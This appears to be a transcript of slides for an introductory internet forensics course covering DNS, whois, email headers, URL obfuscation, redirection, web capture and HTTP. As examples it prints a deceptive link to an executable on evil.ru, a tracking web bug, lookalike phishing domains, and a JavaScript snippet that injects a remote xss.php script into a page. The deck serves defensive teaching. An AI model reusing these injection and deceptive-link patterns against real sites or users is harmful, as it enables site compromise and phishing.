Internet Forensics 101

Transcript

1. Internet Forensics 101 Benjamin Scott Paul Alderson

2. Internet Forensics: DNS and Email

3. The Internet in brief • Connecting to a remote computer

   requires its Internet Protocol address ◦ IPv4 - 66.228.49.238 ◦ IPv6 - 2600:3c00::f03c:91ff:fedf:78db • IANA gives blocks of IPs to Regional Internet Registries ◦ North America, South America, Asia-Pacific, Latin America, Africa ◦ RIRs give addresses to ISPs and hosting providers • Early adopters have legacy allocations ◦ US Gov't / Military ◦ Universities

4. The Internet in Continued Only 4.3 billion IPv4 addresses Many

   are reserved or in legacy space Network Address Translation (NAT) Share one public IP with many machines Requires hardware and logic in software CIDR notation 10.0.0.0/8 = all IP addresses beginning with 10

5. What's in a Name? • Domain Names map of IP

   addresses to websites ◦ Easier to read and remember ◦ Allow for logical separation of sites • Generic Top level domains ◦ .com .net .edu .info • Country-specific TLDs ◦ .tv .ru .nl .us • Vanity TLDs ◦ .canon .name .pants

6. Types of DNS Records Basically Required A = IP version

   4 address MX = Email server for domain NS = Name server Helpful to Have AAAA = IP version 6 address PTR = Pointer to domain for an IP address SPF = Sender Policy for anti-spam SRV = Pointer to any service TXT = Arbitrary Text

7. Resolving www.banana.com 1. Check hosts file (do we have the

   mapping hardcoded?) 2. Check local cache (have we seen this mapping in the past few minutes?) 3. Ask preferred DNS server (does Verizon know this mapping?) 4. DNS Server goes up the food chain a. Asks root DNS server where to find '.com' NS b. Asks .com NS where to find 'banana.com' NS c. Asks banana.com NS where to find 'www' d. www.banana.com responds "authoritatively" e. DNS Server responds with 69.164.205.196

8. Getting domain records On Windows: $ nslookup isightpartners.com 208.68.38.2 On

   *nix $ dig @ns1.google.com mail.google.com ;; ANSWER SECTION: mail.google.com. 604800 IN CNAME googlemail.l.google.com. googlemail.l.google.com. 300 IN A 74.125.228.86 googlemail.l.google.com. 300 IN A 74.125.228.85

9. Common attacks on DNS DNS cache poisoning Forging responses to

   nameservers Requires guessing the Query ID Typo-squatting (whitehouse.com) Registering similar domains Transferring DNS records Social engineering the registrar

10. Whois data Show who owns an Internet resource Can be

    fake or protected Stored with RIR or domain registrar On *nix $ whois 64.4.11.37 (from ARIN) NetRange: 64.4.0.0 - 64.4.63.255 NetName: HOTMAIL Address: One Microsoft Way City: Redmond

11. Electronic Mail Simple Mail Transfer Protocol (SMTP) Headers: Recipient, Sender

    Body: Text, Attachments Mail Submission Agent (MSA) Listens on ports 587 and/or 25 Accepts mail on behalf of users Mail Transfer Agent (MTA) Looks up MX record of recipient

12. Routing Headers "Received" headers log routing information Top line is

    the latest transaction Only trust your mailserver Example: sending from office to home email Received: by 10.4.18.32(internal.google.com) Received: from mail.yourcompany.biz by mail.google.com with ESMTP id <stuff> Sun, 10 May 2013 12:84:29 -0400 (EDT)

13. Address Headers From: "James Handsome" <[email protected]> Return-Path: [email protected] Message-ID: <[email protected]>

    Optional Header lines start with "X-" X-Accept-Language: en-us, zh-cn X-Spam-Score: 70 X-Mailer: The Bat! 2.1 X-Originating-IP: 72.5.9.4

14. Content Headers Message body is included after content definition Subject:

    Party Invite Content-Type: text/plain; Content-Transfer-Encoding: 7bit See you at 10! Content-Type: text/html; <html> <blink> Sweet </blink>

15. Attachments Non-text data can be sent via SMTP Multipurpose Internet

    Media Extensions (MIME) MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=video_games [...text attachment...] --video_games Content-Type: application/octet-stream; name="agenda.pdf" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="agenda.pdf" JVBERiBibGFoIGJsYWggYmxhaA== --video_games-- Attachment Filename Base-64 encoded PDF MIME Boundary Tag

16. HTML Body Text Allows for rich content: colors, images, links

    Issue: Malicious Links Display text differs from actual destination <a href="http://evil.ru/a.exe">Payment Notification </a> Issue: Web Bugs Load invisible images to track receipt time and IP <img src="http://ad.shady.net/track.gif"

17. Attacks on Email Spoofed sender 'From' and 'Return-Path' different than

    real sender Forged headers Mis-matched sender name and IP address Received:from legit.gov (spammer.com [81.95.144.7] 'X-Spam-Filtered' lines added by spammer Phishing Email from a compromised or spoofed sender with enticing theme and malicious contents

18. Internet Forensics: Obfuscation

19. URL Obfuscation • Based on social-engineering ◦ https://intrasight.isightpartners.int/malcode/URL_Obfuscation ◦ http://www.isightpartners.com

    ◦ http://%77%77%77%2e%69%73%69%67%68%74% 70%61%72%74%6e%65%72%73%2e%63%6f%6d ◦ http://[email protected] ◦ google ◦ http://208.68.38.2 ◦ http://3494127106 ◦ 208(256^3) + 68(256^2) + 38(256^1) + 2(256^0) = 3494127106

20. Related Domain Names • Based on social-engineering ◦ citbank.com ◦

    bankofamericaportal.com ◦ hxxp://webmail.hbo.com.s-thrones.co[.]ru • Dynamic DNS ◦ Hostnames are independent of each other since arbitrary people can request an entry ◦ Some providers allow client side software that will change the DNS entry based on the IP address of the client ◦ palderson.findme.com ◦ dol.ns01.us ◦ microsoft.ns01.us

21. Redirection • Page-based ◦ <meta http-equiv="refresh" content="N; URL=other-web-address"> • Example

    <html><head> <meta http-equiv="refresh" content="2; URL=http://www.isightpartners.com"> </head> </html>

22. Redirection • Standard HTTP header HTTP/1.1 200 ok Content-type: text/html

    Content-length: 78 • For non-200 messages: Instead of a web-page being returned, just an HTTP code is returned.

23. Server-based Redirection • 301 - Moved permanently • 302 -

    Temporary redirect • 303 - "Operation has completed, continue here.." • 307 - Temporary redirect (Does anyone use this?)

24. Redirection • Normal javascript <html> <head> <!-- BEGIN JavaScript -->

    <script src="//ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script> <script src="//webapps.dol.gov/FSPublic/Scripts/W_Helpful.js"></script> <script src="//s7.addthis.com/js/300/addthis_widget.js#pubid=usdol"></script> <script src="/scripts/main.js"></script> <script src="/scripts/dol.plugins.js"></script> <link href="//webapps.dol.gov/FSPublic/Content/W_Helpful.css" rel="stylesheet"> <!-- END JavaScript --> </head> <body> ...

25. Redirection • Redirection and/or includes via javascript ◦ h=document.createElement('script'); ◦

    h.src='http://dol.ns01.us:8081/web/xss.php'; ◦ document.getElementsByTagName('head')[0].appen dChild(h); • Dynamically adds new javascript to the page • No new files on infected web server • Small modification to existing javascript

26. Internet Forensics: Web Sites

27. Agenda • Chapter 5 ◦ What is HTML ◦ Capturing

    web-pages ◦ Archiving / spidering ◦ Drive-by ◦ Dynamic web content ◦ Validation and web-application issues

28. View HTML Source • HTML is simply text • After

    visiting site: ◦ Ctrl + U ◦ or via menu • Directly view source without displaying page ◦ view-source:http://www.isightpartners.com/ • Source can reveal page creation software ◦ Meta-tags ◦ Comments ◦ Names within the elements (forms, javascript functions, etc) ◦ Directory names

29. Capturing Web Pages • Why are we capturing? ◦ Forensics

    copy for legal reasons ◦ Determine maliciousness ◦ Find vulnerabilities ◦ Read the page later • Firefox - Save web Page, complete ◦ Rearranges parts of the web page • Internet Explorer - Save Webpage, complete ◦ Adds comments • wget • wget -p

30. Spidering • Visit a web site, visit all the links,

    save the data. • WayBackMachine ◦ http://web.archive.org • Google cache • wget -m • curl • HTTrack • w3af - webSpider • Burp

31. Controlling archiving • robots.txt ◦ Directives to restrict well-behaved spidering

    and archiving. User-agent: * Disallow: /sde/ Disallow: /Portal/ Disallow: /mrtg/ Disallow: /Connections/ Disallow: /css/ Disallow: /includes/ Disallow: /Scripts/ Disallow: /sip/ Disallow: /temp/ Allow: /

32. Drive-by • Visiting a website to determine if it is

    evil. • Burp ◦ web proxy ◦ captures and intercepts/manipulates traffic ◦ spider ◦ brute-forcer ◦ repeater ◦ comparer

33. Drive-by: Burp proxy history

34. Drive-by: Burp Site-map

35. Dynamic Web Pages • Traditional (or static) server ◦ Files

    are read from disk and delivered unchanged to the client • Dynamic server ◦ Program or script is run that creates the content on-demand ◦ Database queries ◦ Remote retrieval ◦ Deliver content based on meta data of the client ▪ IP ▪ Referral Fields ▪ User-Agent

36. Dynamic Web Pages • Client side ◦ Javascript ◦ Java

    ◦ Flash • Server side ◦ PHP ◦ Perl ◦ ASP ◦ JSP ◦ CGI

37. Pitfalls of dynamic content • Client-side validation ◦ Faster, more

    responsive ◦ Less bandwidth ◦ Lightens server load ◦ Not a substitute for server-side validation • Server-side validation ◦ Generally more secure ◦ Doesn't expose data or logic to the client

38. Internet Forensics: Web Servers and Clients

39. HTTP: Data transfer of the future Hypertext Transfer Protocol is

    great! Extensible for any content Widely supported and mature protocol Persistent connections in HTTP 1.1 Also it has issues! Must accept a wide range of inputs Lack of session management

40. HTTP Servers Give local files to remote clients Browser: Hi

    twitter.com! Please give me the resource at /NorthernlionLP. Also he's the best Server: Cool, here's that page, and I ignored that 'best' GET variable IDK what it means http://twitter.com/NorthernlionLP?best=yes

41. What the Client Sends (Request-URI) How data will be sent

    and resource name Host: Destination domain Referer: Originating page for request User-Agent: Client version and compatibility Accept-Language: English, you speak it? GET /highscores.html HTTP 1.1 Host: competitive-eating.biz Referer: google.com/search/q?sandwiches User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/26.0.1410.64 Safari/537.31 Accept-Language: en-us

42. Other Client Requests GET: Get a page, with variables in

    URI POST: Send data directly to site with same URI PUT: Create a resource [usually ignored] CONNECT: Get page on my behalf Optional Client Headers X-Forwarded-For: 73.5.1.2 (proxy logs) DNT: 1 (please don't track me)

43. (Response Code:) Page exists, has moved, or is gone Location:

    Full URI for page Server: Server version and installed modules Content-Type: MIME Format of the response Last-Modified: Whether page should be refreshed from cache HTTP/1.1 200 OK Location: http://competitive-eating.biz/highscores.html Server: Nginx/1.41 Content-Type: text/html Last-Modified: Fri, 10 May 2013 02:01:13 GMT <HTML> <title>ALL TIME CHAMPIONS</title> </HTML> The Server's Response

44. Other Server Responses 200: Got your page right here 302:

    Your page moved over there 404: There never was a page, man 502: Server crashed Optional Headers X-XSS-Protection: 1 X-Powered-By: PHP

45. Cookies Files written to client Persistent until expire or deleted

    Set using Set-Cookie or scripts user=couch,scotch=macallan; expires=Sat,16-May-2013; path=/; domain=.amazon.com i.e. this cookie denotes that I'm Couch and my purchase info. It can only be read by Amazon.

46. Server-side Scripting Creates pages on demand Formats for different browsers

    Common Modules CGI scripts {PHP, ColdFusion, Python} Embedded Interpreters {Ruby, JavaScript} Server Client Request Module <HTML> DB Write Query Serve

47. Proxies Route HTTP traffic | |-> through another machine Non-anonymous:

    Add X-Forwarded-For: $your_ip The Onion Router (TOR): Encrypts data within "Relay nodes" "Exit nodes" connects to destination site.com Proxy Client HTTP CONNECT site.com HTTP GET site.com